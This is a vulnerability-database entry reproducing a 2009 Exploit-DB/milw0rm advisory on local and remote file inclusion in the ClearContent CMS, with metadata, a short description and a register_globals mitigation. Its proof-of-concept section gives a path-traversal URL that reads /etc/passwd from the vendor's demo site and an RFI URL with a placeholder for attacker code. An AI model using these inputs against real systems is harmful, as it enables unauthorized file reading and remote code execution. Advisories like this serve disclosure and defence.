ClearContent

vendor:

ClearContent

by:

MizoZ [EvilWay Team]

8,8

CVSS

HIGH

Local File Inclusion/Remote File Inclusion

CWE

Product Name: ClearContent

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

ClearContent is prone to a local file inclusion and remote file inclusion vulnerability. An attacker can exploit this issue to include arbitrary files from local resources or remote resources in the context of the vulnerable application. This may aid in further attacks.

Mitigation:

Disable the 'register_globals' directive in the php.ini configuration file.

Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------

  Name : ClearContent
  Site : http://www.allisclear.com/

  Demo : http://demo.allisclear.com/

----------------------------------------------------------------------------------------------------

 
  Found By : MizoZ [EvilWay Team]

  Made in  : Morocco
  Contact  : mizozx[at]gmail[dot]com
  Greetz   : Moudi , Zuka , All friends


----------------------------------------------------------------------------------------------------


  P0c:
 
    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???


 RFI needs register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-09]